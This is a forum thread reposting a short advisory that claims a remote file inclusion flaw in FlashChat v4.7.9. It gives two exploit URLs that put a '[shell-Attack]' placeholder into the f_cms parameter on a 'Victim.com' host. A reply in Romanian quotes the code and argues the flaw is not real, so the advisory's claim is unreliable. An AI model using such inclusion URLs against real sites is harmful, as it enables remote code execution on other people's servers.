Jump to content
Gonzalez

Bugtraq: RFI In Script FlashChat_v479

Recommended Posts

Discovered By Hasadya Raed

Contact : RaeD (at) BsdMail (dot) Com [email concealed]

--------------------------

Script : FlashChat_v479

Download : files.filefront.com/FlashChat+v479rar/;7192354;/fileinfo.html

--------------------------

B.Files :

connection.php >Require_once($f_cms);

common.php > Require_once($f_cms);

--------------------------

Exploits :

http://www.Victim.com/chat/incclasses/connection.php?f_cms=[shell-Attack

]

http://www.Victim.com/chat/inc/common.php?f_cms=[shell-Attack]

Link to comment
Share on other sites

Discovered By Hasadya Raed

Contact : RaeD (at) BsdMail (dot) Com [email concealed]

--------------------------

Script : FlashChat_v479

Download : files.filefront.com/FlashChat+v479rar/;7192354;/fileinfo.html

--------------------------

B.Files :

connection.php >Require_once($f_cms);

common.php > Require_once($f_cms);

--------------------------

Exploits :

http://www.Victim.com/chat/incclasses/connection.php?f_cms=[shell-Attack

]

http://www.Victim.com/chat/inc/common.php?f_cms=[shell-Attack]

codul:

in common.php



//if ($GLOBALS['fc_config']['CMSsystem'] == 'phpBB2CMS')
{
//---CMS
$f_cms = INC_DIR . 'cmses/' . $GLOBALS['fc_config']['CMSsystem'] . '.php';
if( !file_exists($f_cms) || !is_file($f_cms) )
require_once(INC_DIR . 'cmses/statelessCMS.php');//free for all users
else
require_once( $f_cms );
//---end CMS
}

f_cms ii declarat !

nu-i vurnerabil iar in connection.php nu exista variabila aia ::))

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...